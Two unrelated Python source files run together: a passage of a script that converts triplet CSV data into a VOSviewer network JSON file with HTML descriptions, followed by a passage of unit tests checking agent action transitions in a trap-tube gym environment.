                new_path = os.path.join(dir, 'data', input_filepath)
                print("Run Program on this filepath: " + new_path + " ? (y/n)")
                user_input = input()
                # Guard against empty input before indexing the first character.
                if user_input and user_input[0] in ('Y', 'y'):
                    args.input_filename = new_path
                    found_file = True
                    break
            if not found_file:
                print("No more valid input files. Exiting Program")
                exit()
        else:
            print("Exiting Program")
            exit()
    return {
        "file_path" : args.input_filename,
        "node_column_names" : [args.node_col_name_1, args.node_col_name_2],
        "edge_column_name" : args.edge_col_name,
        "context_column_name" : args.context_col_name,
        "output_path" : args.output,
        "verbosity": args.verbosity,
        "include_formatted_html" : args.include_formatted_html
    }
def extract_int_code(file_name):
    """Return the interview code: the part before the first '-', minus its last character."""
    prefix, _, _ = file_name.partition('-')
    return prefix[:-1]
def make_html(drive_id):
    """Build a direct-view Google Drive URL for *drive_id*."""
    return f"https://drive.google.com/uc?export=view&id={drive_id}"
def clean_text(input_text):
    """Normalize a text value: trimmed and sentence-cased.

    Non-string values (NaN, None, numbers) are returned unchanged.
    """
    try:
        return input_text.lower().strip().capitalize()
    except AttributeError:
        # Not a string -- pass it through untouched.
        return input_text
def configure_metadata(df_input):
    """Attach Discrimination-dataset metadata to *df_input*.

    Adds drive_id/image_link columns (speaker pictures), rewrites URLs with
    segment numbers, and extracts testimony ids.  Uses the module-level
    ``dir`` global set in the ``__main__`` block.
    """
    try:
        filename = os.path.join(dir, 'description_metadata', 'drive_ids.csv')
        drive_ids = pd.read_csv(filename)  # need to make this flexible to provide custom drive ids
    except Exception:
        print("Error reading google drive id file. Exiting Program")
        # BUG FIX: previously execution fell through and crashed on the
        # undefined `drive_ids`; actually exit as the message promises.
        exit()
    drive_ids['int_code'] = [extract_int_code(x) for x in drive_ids['file_name']]
    drive_ids['drive_id'] = drive_ids['drive_id'].astype('str')
    drive_ids['int_code'] = drive_ids['int_code'].astype('int64')
    # BUG FIX: drop_duplicates returns a new frame; the result was discarded.
    drive_ids = drive_ids.drop_duplicates(subset='int_code')
    drive_ids_ = []
    for row in df_input.itertuples():
        if row.intcode in drive_ids['int_code'].to_list():
            drive_ids_.append(drive_ids[drive_ids['int_code'] == row.intcode]['drive_id'].values[0])
        else:
            drive_ids_.append('nan')
    df_input['drive_id'] = drive_ids_
    df_input['image_link'] = [make_html(x) for x in df_input['drive_id']]
    # (Removed a chained-assignment no-op here: `df[mask][col] = ...` writes to
    # a copy and never updates the frame; the loop below does the real fix-up.)
    corrected_link = []
    for value in df_input['image_link']:
        if value == 'https://drive.google.com/uc?export=view&id=nan':
            corrected_link.append('https://via.placeholder.com/100.png?text=Speaker+Picture')
        else:
            corrected_link.append(value)
    df_input['image_link'] = corrected_link
    corrected_URL = []
    testimony_id = []
    for row in df_input.itertuples():
        # BUG FIX: testimony_id must receive one entry per row; it was only
        # appended when segment was present, so the later column assignment
        # raised a length-mismatch ValueError for frames with NaN segments.
        testimony_id.append(row.URL.split('&')[0].split('=')[1])
        if not pd.isna(row.segment):
            url = row.URL.split('&')[0]
            url = url + '&segmentNumber=' + str(row.segment)
            corrected_URL.append(url)
        else:
            corrected_URL.append(row.URL.split('&')[0])
    df_input['URL'] = corrected_URL
    df_input['testimony_id'] = testimony_id
    return df_input
def format_dataframe(df, path):
    """Translate the triplet dataframe into a VOSviewer network JSON file at *path*.

    Builds one VOSviewer "item" per unique entity and one "link" per unique
    (subject, relation, object) triple, each with an HTML description.
    Reads the module globals ``args_dict`` and ``dir`` set in ``__main__``.
    """
    df['subjects_coref'] = [clean_text(x) for x in df['subjects_coref']]
    df['objects_coref'] = [clean_text(x) for x in df['objects_coref']]
    # get all of the entities from the corpus
    # (pd.concat replaces Series.append, deprecated and removed in pandas >= 2.0)
    all_entities = pd.concat([df['subjects_coref'], df['objects_coref']])
    # eliminate duplicate entry
    all_entities = all_entities.drop_duplicates()
    # reset index, use index of unique entities as id
    all_entities = all_entities.reset_index(drop=True)
    all_entities.index = range(1, len(all_entities) + 1)
    # first generate the nodes by finding unique entities in the spreadsheet...
    entity_list_to_convert = []
    filename = os.path.join(dir, 'description_metadata', 'contraction.csv')
    contractions = pd.read_csv(filename)
    contractions = dict(zip(contractions.extended, contractions.contraction))
    filename = os.path.join(dir, 'description_metadata', 'manual_relation_corrections.csv')
    manual_corrections = pd.read_csv(filename)
    manual_corrections = dict(zip(manual_corrections.full_text, manual_corrections.manual_corrections))

    def make_heading_html(text):
        # Section heading used inside description boxes.
        return "<div class='description_heading'>" + text + "</div>"

    def make_formatted_text_html(text, relation):
        # Bold the relation inside its context sentence; fall back to the
        # contraction and manual-correction lookups when the relation text
        # does not occur verbatim in the sentence.
        relation = relation.strip()
        context = text.split(relation)
        if len(context) == 1:
            # search for a contraction
            for extended in contractions.keys():
                if extended in relation:
                    relation = contractions[extended]  # replace extended phrase with contraction of extended
                    context = text.split(relation)
                    break
        if len(context) == 1:
            # search for manual corrections...
            for full_text in manual_corrections.keys():
                if full_text == text or full_text in text:
                    relation = manual_corrections[full_text]
                    context = text.split(relation)
        try:
            return '<div class="basic_text" >' + context[0] + "<b>" + relation + "</b>" + context[1] + "</div>"
        except TypeError:
            return ""
        except IndexError:
            return '<div class="basic_text" >' + text + "</div>"

    def make_label_html(text):
        return "<div class='description_label'>" + text + "</div>"

    def make_link_html(text, link):
        return "<a class='description_url' href='" + link + "'>{" + text + "}</a>"

    def make_specialized_triplet(df):
        # Discrimination-dataset description: speaker link, picture, context.
        output = ''
        for row in df.itertuples():
            output = output + ("<div class='description_heading'><a class='description_url' href='" + row.URL + "'> " + row.full_name + " </a></div>" + '<img src=' + row.image_link + ' width="200px" height="auto">'
                               + make_heading_html('Context: ') + make_formatted_text_html(row.texts, row.relations) + "<hr>")
        output = output[:-4]  # drop the trailing "<hr>"
        return output

    def make_generic_triplet(df):
        # BUG FIX: `output` was reset inside the loop (keeping only the last
        # row) and was unbound for an empty dataframe; initialize it once.
        output = ''
        for row in df.itertuples():
            output = output + ('<div class="basic_text" >' + "<b>" + str(args_dict["node_column_names"][0]) + ": " + "</b>" + row.subjects_coref + "</div>" +
                               '<div class="basic_text" >' + "<b>" + str(args_dict["edge_column_name"]) + ": " + "</b>" + row.relations + "</div>" +
                               '<div class="basic_text" >' + "<b>" + str(args_dict["node_column_names"][1]) + ": " + "</b>" + row.objects_coref + "</div>")
            try:
                output = output + '<div class="basic_text" >' + "<b>" + str(args_dict['context_column_name']) + ": " + "</b>" + str(row.texts) + "</div>"
            except AttributeError:  # narrowed from a bare except: no context column
                pass
            output = output + "<hr>"
        output = output[:-4]  # drop the trailing "<hr>"
        return output

    # make descriptions for each entity
    for entity in all_entities:
        if pd.isna(entity):
            continue
        sample_triplets = df[(df['subjects_coref'] == entity) | (df['objects_coref'] == entity)]
        sample_triplets = sample_triplets.sample(frac=1, random_state=0)
        sample_triplets = sample_triplets.head(3)  # only sample the top 3 entities
        entity_to_convert = {
            "id": int(all_entities[all_entities == entity].index[0]),
            "label": str(entity),
            "weights": {
                "Documents": 1,  # len(df[df['subjects_coref'] == entity]), number of times entity appeared in subset relations (could incorporate global metrics)
                "Citations": 1  # len(df[df['subjects_coref'] == entity]) same as above, but number of relations
            }
        }
        # BUG FIX: trailing commas removed below -- they wrapped the description
        # string in a 1-tuple, which then serialized as a JSON array.
        # NOTE(review): the literal "{label}" placeholder is never substituted -- confirm intent.
        if args_dict['include_formatted_html'] >= 1:
            entity_to_convert["description"] = '<div class="content-box">' + "<div class='description_heading'> Sample Triplets: {label} </div>" + make_specialized_triplet(sample_triplets) + '</div>'
        else:
            entity_to_convert["description"] = '<div class="content-box">' + "<div class='description_heading'> Sample Triplets: {label} </div>" + make_generic_triplet(sample_triplets) + '</div>'
        entity_list_to_convert.append(entity_to_convert)
    items = entity_list_to_convert
    # generate descriptions for each link; should look into implementing protocol for looking at duplicate instances
    df_dedupe = df.drop_duplicates(subset=['subjects_coref', 'relations', 'objects_coref'])
    links = []
    for row in df_dedupe.itertuples():
        if pd.isna(row.subjects_coref) or pd.isna(row.objects_coref):
            continue
        try:
            link_python = {
                "source_id" : int(all_entities[all_entities == row.subjects_coref].index[0]),
                "target_id" : int(all_entities[all_entities == row.objects_coref].index[0]),
                "strength" : 1  # len(df[(df['subjects_coref'] == row.subjects_coref) & (df['objects_coref'] == row.objects)]),
            }
            if args_dict['include_formatted_html'] >= 1:  # bespoke formatting
                link_python["description"] = ('<div class="content-box">' + "<div class='description_heading'><a class='description_url' href='" + row.URL + "'> " + row.full_name + " </a></div>" + '<img src=' + row.image_link + ' width="200px" height="auto">'
                                              + make_heading_html('Context: ') + make_formatted_text_html(row.texts, row.relations) + '</div>')
            else:  # generic formatting
                output = ('<div class=basic_text >' + "<b>" + str(args_dict["node_column_names"][0]) + ": " + "</b>" + row.subjects_coref + "</div>" +
                          '<div class="basic_text" >' + "<b>" + str(args_dict["edge_column_name"]) + ": " + "</b>" + row.relations + "</div>" +
                          '<div class="basic_text" >' + "<b>" + str(args_dict["node_column_names"][1]) + ": " + "</b>" + row.objects_coref + "</div>")
                try:  # attempt generic formatting with context
                    output = output + '<div class="basic_text" >' + "<b>" + str(args_dict['context_column_name']) + ": " + "</b>" + str(row.texts) + "</div>"
                except AttributeError:  # no context found, omit context
                    pass
                link_python["description"] = output
        except TypeError:
            continue
        links.append(link_python)

    def make_plural(input_str):  # slightly naive way to handle plurals
        if input_str[-1] == 's' or input_str[-1] == 'S':
            return input_str + 's'
        else:
            return input_str

    data_struct = {'network': {'items': items, 'links': links},
                   'config': {'terminology': {'item' : args_dict["node_column_names"][0] + '/' + args_dict["node_column_names"][1], 'items' : make_plural(args_dict["node_column_names"][0]) + '/' + make_plural(args_dict["node_column_names"][1]),
                                              'link' : args_dict["edge_column_name"], 'links' : make_plural(args_dict["edge_column_name"])},
                              'parameters' : {'item size' : 1},
                              'styles' : {'description_heading' : "label: description-heading;\n color: #757575;\n font-weight: 600;\n font-size: 1.5em;\n ",
                                          'description_label' : "label: description-label;\n ",
                                          'description_text ': "label: description-text;\n margin-bottom: 4px;\n font-size: 1.25em;\n",  # not in use, have been using basic text styling below instead
                                          'basic_text' : "label: basic-text; margin-bottom: 4px;\n font-size: 1.25em;\n",
                                          'description_url' : '\n label: description-url;\n text-decoration: none;\n color: #1e7896;\n font-weight: 600;\n font-size: 1.25em;\n '},}
                   }
    # (Removed an unused json.JSONEncoder().encode(...) call -- json.dump below
    # performs the serialization.)
    with open(path, 'w') as json_file:
        json.dump(data_struct, json_file)
if __name__ == "__main__":
    # Script entry: resolve paths relative to this file, parse the CLI, then
    # normalize the input columns and emit the VOSviewer JSON.
    dir = os.path.dirname(__file__)  # NOTE(review): shadows the `dir` builtin; used as a global by the functions above
    args_dict = read_args()
    try:
        df_input = pd.read_csv(args_dict['file_path'])
    except Exception as e:
        print(e)
        print("Error reading provided input file. Exiting Program")
        exit()
    # easy fix currently, but not very efficient
    df_input['objects_coref'] = df_input[args_dict["node_column_names"][0]]
    df_input['subjects_coref'] = df_input[args_dict["node_column_names"][1]]
    df_input['relations'] = df_input[args_dict["edge_column_name"]]
    try:
        df_input['texts'] = df_input[args_dict["context_column_name"]]
    except KeyError:
        print("Context metadata for triplets not found. Use Argument -c to specify context column within input data (if applicable)")
    if args_dict["include_formatted_html"] >= 1:
        if args_dict['verbosity'] >= 1:
            print('Fetching Metadata for triplets specific to Discrimination Dataset...')
        try:
            df_input = configure_metadata(df_input)
        except Exception as e:
            print(e)
            print("Error fetching metadata for triplets specific to Discrimination Dataset \nBe sure that the input Datatset is formatted in a similar way to Discrimination Dataset, or do not use the -f argument")
            exit()
    if args_dict['verbosity'] >= 1:
        if args_dict["include_formatted_html"] >= 1:
            print("Formatting HTML descriptions specific to Discrimination Dataset...")
        else:
            print("Formatting HTML descriptions for general data")
    try:
        format_dataframe(df_input, args_dict['output_path'])
    except Exception as e:
        print(e)
        print("Error translating Dataset to VOSviewer JSON file")
        exit()
    if args_dict['verbosity'] >= 1:
        out = os.path.basename(args_dict["output_path"])
        print("Finished Task.")
|
"""Tests for trap tube environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import unittest
from absl.testing import absltest
from absl.testing import parameterized
from gym_tool_use import trap_tube_env
# Two-letter shorthands for the 16 composite actions exposed by the env.
# NOTE(review): the exact meaning of the two axes (first vs. second letter)
# is defined by trap_tube_env.ACTIONS — confirm against that module.
uu = trap_tube_env.ACTIONS.up.up
ud = trap_tube_env.ACTIONS.up.down
ul = trap_tube_env.ACTIONS.up.left
ur = trap_tube_env.ACTIONS.up.right
du = trap_tube_env.ACTIONS.down.up
dd = trap_tube_env.ACTIONS.down.down
dl = trap_tube_env.ACTIONS.down.left
dr = trap_tube_env.ACTIONS.down.right
lu = trap_tube_env.ACTIONS.left.up
ld = trap_tube_env.ACTIONS.left.down
ll = trap_tube_env.ACTIONS.left.left
lr = trap_tube_env.ACTIONS.left.right
ru = trap_tube_env.ACTIONS.right.up
rd = trap_tube_env.ACTIONS.right.down
rl = trap_tube_env.ACTIONS.right.left
rr = trap_tube_env.ACTIONS.right.right
class TestEnv(trap_tube_env.BaseTrapTubeEnv):
    """Minimal concrete trap-tube environment for the tests in this module.

    Captures one fixed level layout plus tool/food placement and feeds the
    same values back through `_make_trap_tube_config` when the base class
    asks for them.
    """

    def __init__(self, art, tool_position, tool_size, tool_direction,
                 food_position):
        # Stash the level description before initializing the base class,
        # which may consult _make_trap_tube_config during setup.
        self._art = art
        self._tool_position = tool_position
        self._tool_size = tool_size
        self._tool_direction = tool_direction
        self._food_position = food_position
        super(TestEnv, self).__init__(max_iterations=100, delay=240)

    def _make_trap_tube_config(self):
        """Return the captured layout as a TrapTubeConfig."""
        return trap_tube_env.TrapTubeConfig(
            art=self._art,
            tool_position=self._tool_position,
            tool_size=self._tool_size,
            tool_direction=self._tool_direction,
            food_position=self._food_position,
            tool_category=trap_tube_env.TOOL)

    def make_colors(self):
        """Use the module's default palette."""
        return trap_tube_env.base_colors
class TrapTubeEnvTest(parameterized.TestCase):
    """Exhaustive transition tests for the trap-tube action set.

    Each test builds a small level and asserts whether a given composite
    action changes the observation (assertTransition) or leaves it
    unchanged (assertNoTransition).

    NOTE(review): the internal spacing of the `art` strings below appears
    to have been collapsed in this copy of the file — verify every layout
    against version control before editing them; agent/tool column
    positions are whitespace-significant.
    """

    def setUp(self):
        super(TrapTubeEnvTest, self).setUp()
        # Flip to True locally to watch the episodes while debugging.
        self._render = False

    def _compare_transition(self, env, action, render=False):
        """Reset env, apply one action; True iff the observation is unchanged."""
        initial_state = env.reset()
        if render:
            env.render()
        next_state, _, _, _ = env.step(action)
        if render:
            env.render()
        env.close()
        return np.all(np.equal(next_state, initial_state))

    def assertNoTransition(self, env, action, render=False):
        """Assert that `action` leaves the observation unchanged."""
        self.assertTrue(
            self._compare_transition(env, action, render=render))

    def assertTransition(self, env, action, render=False):
        """Assert that `action` changes the observation."""
        self.assertFalse(
            self._compare_transition(env, action, render=render))

    def testActionsWithToolNoImpassables(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '     a      ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3 + 1, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '     a      ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3 + 1, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                ' a  u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3 + 1, 2),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                ' a  u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3 + 1, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)

    def testActionsWithToolTransitionIntoTube(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '     a      ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 3),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '     a      ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 3),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '     a      ',
                '            ',
                '            ',
            ],
            tool_position=(6, 3),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '    a       ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 4),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolImpassableTubeRight(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '   awwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3, 3),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertNoTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '   au  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(7, 3),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertNoTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '   awwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 2),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertNoTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '   awwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 4),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertNoTransition(env, rr, render=self._render)

    def testActionsWithToolImpassableTubeLeft(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwwwa   ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3, 8),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertNoTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  na   ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(7, 8),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertNoTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwwwa   ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 7),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertNoTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwwwa   ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 9),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertNoTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolImpassableTubeUp(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '       a    ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 7),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertNoTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '       a    ',
                '            ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(7, 7),
            tool_size=4,
            tool_direction=0,
            food_position=(4, 4 + 1))
        self.assertNoTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '      a     ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 6),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 3))
        self.assertNoTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '        a   ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(5, 8),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertNoTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolImpassableTubeDown(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '            ',
                '       a    ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
            ],
            tool_position=(1, 7),
            tool_size=4,
            tool_direction=0,
            food_position=(7, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertNoTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '       a    ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(4, 7),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertNoTransition(env, dd, render=self._render)
        self.assertTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '      a     ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3, 6),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 3))
        self.assertTransition(env, lu, render=self._render)
        self.assertNoTransition(env, ld, render=self._render)
        self.assertTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '        a   ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(3, 8),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertNoTransition(env, rd, render=self._render)
        self.assertTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolBoundariesLeft(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                'a   u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(1, 0),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertNoTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                'a   u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(7, 0),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, du, render=self._render)
        self.assertTransition(env, dd, render=self._render)
        self.assertNoTransition(env, dl, render=self._render)
        self.assertTransition(env, dr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                ' a  u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(6, 0),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, lu, render=self._render)
        self.assertTransition(env, ld, render=self._render)
        self.assertNoTransition(env, ll, render=self._render)
        self.assertTransition(env, lr, render=self._render)
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                'a   u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(6, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertTransition(env, ru, render=self._render)
        self.assertTransition(env, rd, render=self._render)
        self.assertNoTransition(env, rl, render=self._render)
        self.assertTransition(env, rr, render=self._render)

    def testActionsWithToolBoundariesUp(self):
        env = TestEnv(
            art=[
                '            ',
                '            ',
                '            ',
                '            ',
                ' a  mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(0, 1),
            tool_size=4,
            tool_direction=0,
            food_position=(4 + 1, 4 + 1))
        self.assertNoTransition(env, uu, render=self._render)
        self.assertTransition(env, ud, render=self._render)
        self.assertTransition(env, ul, render=self._render)
        self.assertTransition(env, ur, render=self._render)
        env = TestEnv(
            art=[
                ' a          ',
                '            ',
                '            ',
                '            ',
                '    mmmm    ',
                '    u  n    ',
                '    u  n    ',
                '    wwww    ',
                '            ',
                '            ',
                '            ',
                '            ',
            ],
            tool_position=(1, 1),
